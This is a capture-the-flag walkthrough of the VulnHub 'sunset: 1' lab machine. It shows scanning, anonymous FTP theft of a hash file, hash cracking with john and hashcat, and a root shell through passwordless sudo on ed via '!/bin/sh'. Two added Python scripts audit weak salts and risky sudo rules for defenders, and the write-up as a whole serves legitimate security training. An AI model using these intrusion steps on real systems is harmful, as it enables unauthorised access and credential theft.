VulnHub target machine pentest [sunset-1]

Name

Name: sunset: 1
Release date: 29 July 2019

Download

sunset.zip

  • Download: https://mega.nz/#!AGZU1C6J!y_Pc0BEJ2EsAFiBeUY91s4e9mgrlo8sN4aT3wKVen6s
  • Download (Mirror): https://download.vulnhub.com/sunset/sunset.zip
  • Download (Torrent): https://download.vulnhub.com/sunset/sunset.zip.torrent

Description

N/A

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.123
Host is up (0.00016s latency).
MAC Address: 08:00:27:89:F0:14 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -v -p- -sV 192.168.56.123
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
root@kali:~# nmap -p 21,22 -v -A -T4 --script=vuln 192.168.56.123
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Trying it out shows that the FTP service accepts a login as the anonymous user.

Enumeration

As expected, logging in to FTP as the anonymous user succeeds, and a file named "backup" is found there. The file is first saved locally and then opened; it contains password hashes for five users.

root@kali:~/vulnhub/sunset# ftp 192.168.56.123
Connected to 192.168.56.123.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.123:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1062 bytes received in 0.01 secs (135.0579 kB/s)
ftp> quit
221 Goodbye.
root@kali:~/vulnhub/sunset# ls
backup
root@kali:~/vulnhub/sunset# cat backup
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/

Copy these hashes into a file named hash and crack them with john; the hash of the user "sunset" yields the password "cheer14". The next step is to connect over SSH with this username and password.

root@kali:~/vulnhub/sunset# john hash
Warning: detected hash type "HMAC-SHA256", but the string is also recognized as "HMAC-SHA512"
Use the "--format=HMAC-SHA512" option to force loading these as that type instead
Warning: only loading hashes of type "HMAC-SHA256", but also saw type "sha512crypt"
Use the "--format=sha512crypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 10 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 11 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 29 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 20 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 26 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 29 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 8 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 16 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 31 candidates buffered for the current salt, minimum 32 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 15 candidates buffered for the current salt, minimum 32 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII

john is too slow here and does not produce a result in a reasonable time (note its own warnings above: it auto-detected the hashes as "HMAC-SHA256" and loaded only 2 of the 5, and it suggests --format=sha512crypt to load them as Linux sha512crypt hashes instead). If the machine has a decent GPU, the rockyou.txt wordlist can be used with hashcat to crack the passwords, as follows:

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 1800 password.txt rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.
We are waiting for updated OpenCL drivers from Intel.
You can use --force to override, but do not report related errors.
nvmlInit(): Unknown Error

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1070, 2048/8192 MB allocatable, 16MCU

OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) UHD Graphics 630, skipped.
* Device #3: Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, skipped.

Hashes: 5 digests; 5 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344367
* Bytes.....: 139921318
* Keyspace..: 14344360
* Runtime...: 3 secs

$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/:space
$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/:cheer14
Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password- and salt-length (typically down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Update your OpenCL runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0:sky
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: password.txt
Time.Started.....: Wed Apr 15 10:29:47 2020 (59 secs)
Time.Estimated...: Wed Apr 15 10:42:31 2020 (11 mins, 45 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18801 H/s (10.91ms) @ Accel:64 Loops:32 Thr:32 Vec:1
Recovered........: 3/5 (60.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 2162688/28688720 (7.54%)
Rejected.........: 0/2162688 (0.00%)
Restore.Point....: 1081344/14344360 (7.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:640-672
Candidates.#1....: 496580 -> 145263w
Hardware.Mon.#1..: N/A

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: password.txt
Time.Started.....: Wed Apr 15 10:29:47 2020 (14 mins, 9 secs)
Time.Estimated...: Wed Apr 15 10:43:56 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 16929 H/s (10.62ms) @ Accel:64 Loops:32 Thr:32 Vec:1
Recovered........: 3/5 (60.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 28688720/28688720 (100.00%)
Rejected.........: 0/28688720 (0.00%)
Restore.Point....: 14344360/14344360 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: $HEX[284d4f544f29333136] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: N/A

Started: Wed Apr 15 10:29:17 2020
Stopped: Wed Apr 15 10:43:58 2020

Use the following command to show the passwords that have already been cracked:

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 1800 password.txt rockyou.txt --show
$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/:space
$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0:sky
$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/:cheer14

This gives three cracked user/password pairs:

space   space
sky     sky
sunset  cheer14
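The hashcat run above reports "5 unique digests, 2 unique salts", and four of the five entries in the backup file start with `$6$$`, i.e. an empty salt. The following Python script is an added example, not code from the original post or from the challenge: it parses crypt(3)-style hash lines such as those in the backup file, maps each to its hashcat mode, and flags empty or shared salts and reduced round counts, which is the check a defender would run over a leaked credentials file. The hash lines embedded in it are the ones from the backup file above; the `rounds=` handling and the locked-account case are generalisations beyond what the page shows.

```python
"""Audit crypt(3)-style password hashes for weak parameters.

Added example for this write-up, not code from the original post or from
the VulnHub challenge. Parses lines of the form ``user:$id$salt$digest``
and reports algorithm, hashcat mode, empty salts and shared salts.
"""
from collections import defaultdict

# crypt(3) identifier -> (algorithm, hashcat mode). The mode numbers are
# hashcat's documented values for these formats; 1800 is the one used above.
CRYPT_IDS = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
}

# Contents of the backup file fetched over anonymous FTP (copied from the page).
SAMPLE_BACKUP = """\
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
"""


def parse_crypt(field):
    """Split '$id$[rounds=N$]salt$digest' into its parts, or return None.

    The salt is the text between the second and third '$' and may be
    empty, which is exactly the weakness this audit looks for.
    """
    parts = field.split("$")
    # A well-formed field starts with '$', so parts[0] is always ''.
    if len(parts) < 4 or parts[0] != "" or parts[1] not in CRYPT_IDS:
        return None
    ident, rest = parts[1], parts[2:]
    rounds = None
    if rest[0].startswith("rounds="):
        try:
            rounds = int(rest[0][len("rounds="):])
        except ValueError:
            return None
        rest = rest[1:]
    if len(rest) != 2 or rest[1] == "":
        return None
    salt, digest = rest
    algorithm, mode = CRYPT_IDS[ident]
    return {"id": ident, "algorithm": algorithm, "hashcat_mode": mode,
            "rounds": rounds, "salt": salt, "digest": digest}


def audit_credentials(text):
    """Audit 'user:hash' lines; return (records, number_of_unique_salts)."""
    records = []
    by_salt = defaultdict(list)  # (id, salt) -> users that share it
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        user, _, field = line.partition(":")
        if field == "":
            continue  # header line such as 'CREDENTIALS:'
        if field.startswith(("*", "!")):  # locked account in a real shadow file
            records.append({"user": user, "parsed": None,
                            "findings": ["locked, no password hash"]})
            continue
        parsed = parse_crypt(field)
        if parsed is None:
            records.append({"user": user, "parsed": None,
                            "findings": ["unrecognised hash format"]})
            continue
        findings = []
        if parsed["salt"] == "":
            findings.append("empty salt")
        if parsed["rounds"] is not None and parsed["rounds"] < 5000:
            findings.append("rounds below the 5000 default")
        by_salt[(parsed["id"], parsed["salt"])].append(user)
        records.append({"user": user, "parsed": parsed, "findings": findings})
    # Same algorithm and same salt means identical hashes for identical
    # passwords, so one cracked entry can be compared against the rest for free.
    for rec in records:
        if rec["parsed"] is None:
            continue
        key = (rec["parsed"]["id"], rec["parsed"]["salt"])
        others = [u for u in by_salt[key] if u != rec["user"]]
        if others:
            rec["findings"].append("salt shared with " + ", ".join(others))
    return records, len(by_salt)


def main():
    records, salts = audit_credentials(SAMPLE_BACKUP)
    print(f"{len(records)} hashes, {salts} unique salt(s)")  # same count hashcat printed
    for rec in records:
        print(f"{rec['user']:<12} {', '.join(rec['findings']) or 'ok'}")


if __name__ == "__main__":
    main()
```

Run as a script it prints one line per user; only `sunset` comes back as `ok`, because it is the only entry with a real salt, and the unique-salt count of 2 is the same figure hashcat printed. The empty-salt entries are the ones a defender should treat as broken regardless of password strength.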

Exploitation and privilege escalation

Log in over SSH as the user sunset; a file named user.txt is found there, and it again contains a hash value.

Next, check what this user may run with sudo (sudo -l), and find that /usr/bin/ed can be run as root without a password.

So run ed under sudo, issue the !/bin/sh command inside it, and obtain root access.

After becoming root, another file named flag.txt is found;

this yields the final flag. Root access has been obtained and this CTF box is complete.

root@kali:~# ssh sunset@192.168.56.123
The authenticity of host '192.168.56.123 (192.168.56.123)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.123' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
sunset@192.168.56.123's password:
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$ id
uid=1000(sunset) gid=1000(sunset) groups=1000(sunset),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
sunset@sunset:~$ whoami
sunset
sunset@sunset:~$ ls
user.txt
sunset@sunset:~$ cat user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
(root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$ sudo /usr/bin/ed
id
?
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/home/sunset
# cd /root
# ls
flag.txt ftp server.sh
# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
#
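The sudo -l output above is the kind of evidence a defender would want to review in bulk rather than by eye. The following Python script is an added example, not code from the original post: it parses the rules section of sudo -l output, flags NOPASSWD grants, unrestricted ALL or wildcard command specs, and interactive editors or pagers granted without sudo's NOEXEC tag (ed above is one such case), and names sudoedit or the NOEXEC tag as the fix. The sample input reuses the page's own sudo -l output plus two constructed extra rules so that the other branches are exercised.

```python
"""Flag risky sudo grants from the text that ``sudo -l`` prints.

Added example for this write-up, not code from the original post. Parses
the "User X may run the following commands" section of ``sudo -l`` output
and reports rules a defender would revisit. The mitigations named are
sudo's own features (sudoedit and the NOEXEC tag).
"""
import re

# Interactive editors and pagers: each has a documented way to run an
# external command, so granting one as root is equivalent to granting a
# root shell unless the rule carries the NOEXEC tag.
SHELL_CAPABLE = {"ed", "vi", "vim", "nano", "less", "more", "man"}

# One rule line: "(runas) TAG: TAG: cmd, cmd ..."
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# The page's own sudo -l output, followed by two constructed rules
# (the vim and ALL lines) that are not on the target machine.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
    (root) NOEXEC: /usr/bin/vim /etc/motd
    (ALL : ALL) ALL
"""


def parse_sudo_l(text):
    """Return the rules (runas, tags, cmds) listed after the 'may run' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        # Commands are comma-separated; each may carry fixed arguments.
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmds": cmds})
    return rules


def assess_rules(rules):
    """Pair each rule with its findings; an empty list means nothing to flag."""
    report = []
    for rule in rules:
        findings = []
        if "NOPASSWD" in rule["tags"]:
            findings.append("NOPASSWD: no re-authentication before running as "
                            + rule["runas"])
        for cmd in rule["cmds"]:
            if cmd == "ALL" or "*" in cmd:
                findings.append(f"unrestricted command spec '{cmd}'")
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the binary
            if prog in SHELL_CAPABLE and "NOEXEC" not in rule["tags"]:
                findings.append(
                    f"{prog} can spawn a shell; use sudoedit or the NOEXEC tag")
        report.append((rule, findings))
    return report


def main():
    for rule, findings in assess_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        spec = f"({rule['runas']}) {' '.join(rule['tags'])} {', '.join(rule['cmds'])}"
        print(spec.strip(), "->", "; ".join(findings) or "ok")


if __name__ == "__main__":
    main()
```

On the page's own rule the script reports both problems at once: the grant needs no password, and ed is an editor that can start a shell. The constructed vim rule passes because NOEXEC stops the editor from executing child processes, which is the sudoers-side fix when an editor really must be granted; for plain file edits, sudoedit avoids running the editor as root at all.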

Summary of key points

  • FTP anonymous user login without a password
  • Cracking Linux sha512 hashes with john
  • Cracking Linux sha512 hashes with hashcat
  • Privilege escalation through passwordless sudo on ed via !/bin/sh

Game over

Sorry, this time I still did not find that Greek expert's foolproof one-click clear-the-box script; I am so sorry about this… It's a pity…

The end, to be continued…